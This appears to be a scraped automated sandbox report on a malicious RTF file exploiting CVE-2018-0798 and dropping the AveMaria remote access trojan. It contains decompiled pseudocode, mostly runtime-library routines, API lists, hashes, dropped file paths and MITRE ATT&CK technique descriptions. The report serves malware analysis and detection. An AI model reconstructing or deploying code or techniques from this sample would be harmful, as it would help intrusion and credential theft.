				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x416030; // 0x5
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00404892(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E0040695A(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00404892(__eflags,  *0x416030, _t51);
							if(__eflags != 0) {
								E00404EFE(_t51, 0x417388);
								E00405BB5(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00404892(__eflags,  *0x416030, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00404892(0,  *0x416030, 0);
							_push(0);
							L9:
							E00405BB5();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00404853(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x416030; // 0x5
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00404251(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x416030; // 0x5
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00404892(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E0040695A(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00404892(__eflags,  *0x416030, _t60);
								if(__eflags != 0) {
									E00404EFE(_t60, 0x417388);
									E00405BB5(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00404892(__eflags,  *0x416030, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00404892(__eflags,  *0x416030, _t20);
								_push(_t60);
								L25:
								E00405BB5();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00404853(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x416030; // 0x5
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00404251(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x416030; // 0x5
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00404892(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E0040695A(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00404892(__eflags,  *0x416030, _t54);
											if(__eflags != 0) {
												E00404EFE(_t54, 0x417388);
												E00405BB5(0);
												goto L45;
											} else {
												_t40 = 0;
												E00404892(__eflags,  *0x416030, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00404892(0,  *0x416030, 0);
											_push(0);
											L41:
											E00405BB5();
											goto L36;
										}
									}
								} else {
									_t54 = E00404853(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x416030; // 0x5
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

APIs

GetLastError.KERNEL32(?,?,?,0040A8A2,?,00000001,00406374,?,0040A726,00000001,?,?,?,00406488,?,?), ref: 00404C8B
_free.LIBCMT ref: 00404CE8
_free.LIBCMT ref: 00404D1E
SetLastError.KERNEL32(00000000,00000005,000000FF,?,0040A726,00000001,?,?,?,00406488,?,?,?,004151F8,0000002C,00406374), ref: 00404D29

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 19cf36f618c59f7cb83a2fb15d6ef9a478e6928b1525a799a34d311a1b4846ba
Instruction ID: 0e5c6abddaa40209bf1749b3ee294736a0be95212525a01e335f8ca19faa93f8
Opcode Fuzzy Hash: 19cf36f618c59f7cb83a2fb15d6ef9a478e6928b1525a799a34d311a1b4846ba
Instruction Fuzzy Hash: EA110DF62055043EE61073BA5D41E6B25699FC07BAB26863BF725722D1DE7CCC01511D

Uniqueness

Uniqueness Score: -1.00%

Function 00404DDD Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00404DDD(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x416030; // 0x5
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00404892(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E0040695A(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E00404892(__eflags,  *0x416030, _t18);
							if(__eflags != 0) {
								E00404EFE(_t18, 0x417388);
								E00405BB5(0);
								goto L13;
							} else {
								_t13 = 0;
								E00404892(__eflags,  *0x416030, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00404892(0,  *0x416030, 0);
							_push(0);
							L9:
							E00405BB5();
							goto L4;
						}
					}
				} else {
					_t18 = E00404853(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x416030; // 0x5
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

APIs

GetLastError.KERNEL32(?,?,?,004065FB,0040BA1A,?,00407C5B,?,00000004,00000000,?,?,?,00402C6D,?,00000000), ref: 00404DE2
_free.LIBCMT ref: 00404E3F
_free.LIBCMT ref: 00404E75
SetLastError.KERNEL32(00000000,00000005,000000FF,?,00407C5B,?,00000004,00000000,?,?,?,00402C6D,?,00000000,00000004), ref: 00404E80

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6e30c080bf1b6dc495eed45e96a61900fda83b4c21b604032c88ac247831b5cf
Instruction ID: 1e001562c87c42a3e509cbcda1b3a97f42f047aa66678785d16abc1b63d63155
Opcode Fuzzy Hash: 6e30c080bf1b6dc495eed45e96a61900fda83b4c21b604032c88ac247831b5cf
Instruction Fuzzy Hash: CD112CB22015003ED71172B9DC81E672569BBC07B9725863BF735B22E1DE788C01819D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D006 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040D006(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x4168a0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0040D07A();
					E0040D05B();
					_t13 = WriteConsoleW( *0x4168a0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x0040d023
0x0040d027
0x0040d034
0x0040d039
0x0040d054
0x0040d054
0x0040d05a

APIs

WriteConsoleW.KERNEL32 ref: 0040D01D
GetLastError.KERNEL32(?,0040C7F1,?,00000001,?,00000001,?,0040ACB4,00000000,?,00000001,00000000,00000001,?,0040A74A,00406488), ref: 0040D029

Part of subcall function 0040D07A: CloseHandle.KERNEL32(FFFFFFFE), ref: 0040D08A

___initconout.LIBCMT ref: 0040D039

Part of subcall function 0040D05B: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 0040D06E

WriteConsoleW.KERNEL32 ref: 0040D04E

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ff34bf17e7485a344c311059e329376c9b7105f419740c4b8e10ea7179de7406
Instruction ID: 921fe11248ca02bc3cc2722cf28d814f332a073af13e4a569be54782c32735de
Opcode Fuzzy Hash: ff34bf17e7485a344c311059e329376c9b7105f419740c4b8e10ea7179de7406
Instruction Fuzzy Hash: 0EF09E36501118BBCF222FD5DC04ADA3F65EB49375F458125FE1C95160C6328961DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004064E2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064E2(void* __ecx) {
				intOrPtr _t9;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				signed int _t28;
				intOrPtr _t30;
				intOrPtr _t31;

				_t9 =  *0x41738c; // 0x200
				_t30 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t30;
					if(_t9 < _t30) {
						_t9 = _t30;
						goto L4;
					}
				} else {
					_t9 = 0x200;
					L4:
					 *0x41738c = _t9;
				}
				 *0x417390 = E0040695A(_t9, 4);
				E00405BB5(0);
				if( *0x417390 != 0) {
					L8:
					_t28 = 0;
					__eflags = 0;
					_t31 = 0x416658;
					do {
						_t1 = _t31 + 0x20; // 0x416678
						E004048D4(__eflags, _t1, 0xfa0, 0);
						_t14 =  *0x417390; // 0x262fa0
						 *((intOrPtr*)(_t14 + _t28 * 4)) = _t31;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0x417158 + (_t28 >> 6) * 4)) + 0x18 + (_t28 & 0x0000003f) * 0x38));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t31 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t31 = _t31 + 0x38;
						_t28 = _t28 + 1;
						__eflags = _t31 - 0x416700;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
					 *0x41738c = _t30;
					 *0x417390 = E0040695A(_t30, 4);
					_t21 = E00405BB5(0);
					if( *0x417390 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}

APIs

_free.LIBCMT ref: 00406510
_free.LIBCMT ref: 00406536

Strings

XfA, xrefs: 0040654F

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: _free
String ID: XfA
API String ID: 269201875-2945588029
Opcode ID: eb8d769550fbb01b57c229e5465fd74317bd4cc391576dedc38c1bfc8db653a9
Instruction ID: 79f92c9fcaeeae16a9342114995ab5baeb5ae5518b9c43b6957482a58298109e
Opcode Fuzzy Hash: eb8d769550fbb01b57c229e5465fd74317bd4cc391576dedc38c1bfc8db653a9
Instruction Fuzzy Hash: DD11E671A042116BD7209F29BC01B9637A4A750738F16473BFD26EB6D1E37CE851974C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040A4F8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t26;
				signed int _t42;
				void* _t44;

				_push(0xc);
				_push(0x4152d8);
				E00401A10(__ebx, __edi, __esi);
				_t42 = 0;
				 *(_t44 - 0x1c) = 0;
				E0040852F( *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)))));
				 *((intOrPtr*)(_t44 - 4)) = 0;
				if(( *( *((intOrPtr*)(0x417158 + ( *( *( *(_t44 + 0xc))) >> 6) * 4)) + 0x28 + ( *( *( *(_t44 + 0xc))) & 0x0000003f) * 0x38) & 0x00000001) == 0) {
					L3:
					 *((intOrPtr*)(E004065F6(_t49))) = 9;
					_t42 = _t42 | 0xffffffff;
				} else {
					_t26 = FlushFileBuffers(E00408141(_t39));
					_t49 = _t26;
					if(_t26 == 0) {
						_t42 = E00406609(_t49);
						 *_t42 = GetLastError();
						goto L3;
					}
				}
				 *(_t44 - 0x1c) = _t42;
				 *((intOrPtr*)(_t44 - 4)) = 0xfffffffe;
				E0040A58E();
				_t13 = _t44 - 0x10; // 0x406374
				 *[fs:0x0] =  *_t13;
				return _t42;
			}

APIs

Part of subcall function 0040852F: EnterCriticalSection.KERNEL32(00000001,?,0040A5FE,?,004152F8,00000010,004062B5,00000000,00000000,?,?,?,?,0040624C,?,00000000), ref: 0040854A

FlushFileBuffers.KERNEL32 ref: 0040A541
GetLastError.KERNEL32 ref: 0040A552

Strings

tc@, xrefs: 0040A579

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: BuffersCriticalEnterErrorFileFlushLastSection
String ID: tc@
API String ID: 4109680722-2494914666
Opcode ID: 545b111415b0e48b240af109eb91a41c2fb8b2137dabee29e29f717508a4034c
Instruction ID: 6deb588d86354f9cd818fcba4fbcfa1ada93347c37fdcc8e48197b277fa95a5b
Opcode Fuzzy Hash: 545b111415b0e48b240af109eb91a41c2fb8b2137dabee29e29f717508a4034c
Instruction Fuzzy Hash: 08018072A002049FC714AFA9E90569E77B0EB89724B14426FF811AB3E1DB78D8418B49

Uniqueness

Uniqueness Score: -1.00%

Function 00404742 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404742(char _a4) {
				struct HINSTANCE__** _t5;

				if(_a4 == 0) {
					_t5 = 0x416f28;
					do {
						if( *_t5 != 0) {
							if( *_t5 != 0xffffffff) {
								FreeLibrary( *_t5);
							}
							 *_t5 =  *_t5 & 0x00000000;
						}
						_t5 =  &(_t5[1]);
					} while (_t5 != 0x416f78);
				}
				return 1;
			}

0x0040474b
0x0040474e
0x00404753
0x00404756
0x0040475b
0x0040475f
0x0040475f
0x00404765
0x00404765
0x00404768
0x0040476b
0x00404773
0x00404777

APIs

FreeLibrary.KERNEL32(00416F28), ref: 0040475F

Strings

(oA, xrefs: 0040474E
xoA, xrefs: 0040476B

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: FreeLibrary
String ID: (oA$xoA
API String ID: 3664257935-1795384092
Opcode ID: fbeb7b17edff8592abb929a8f4559d9e84d25e3b0c4976b624a5bfd4eb64fc0f
Instruction ID: dc7bf664ccc718e12e6d4739878c8231e49a9d63bcb202f44ca2c1518a9f5354
Opcode Fuzzy Hash: fbeb7b17edff8592abb929a8f4559d9e84d25e3b0c4976b624a5bfd4eb64fc0f
Instruction Fuzzy Hash: 8EE04F7280021596DB302A18E44479177E45791336F16423BD9BC262E093794CD2C689

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: AveMaria

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft Vision\05-01-2023_12.32.23

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mwele[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mwele[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\570262F8.wmf

C:\Users\user\AppData\Local\Temp\gnwnekc.exe

C:\Users\user\AppData\Local\Temp\nsmF993.tmp

C:\Users\user\AppData\Local\Temp\pofhrbobst.v

C:\Users\user\AppData\Local\Temp\vlmuzzcvjz.yji

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf

Function 00403640 Relevance: 84.4, APIs: 34, Strings: 14, Instructions: 450
stringfilecomCOMMON

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Function 00403D17 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 004030D0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 204
memoryCOMMON

Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145
stringtimeCOMMON

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

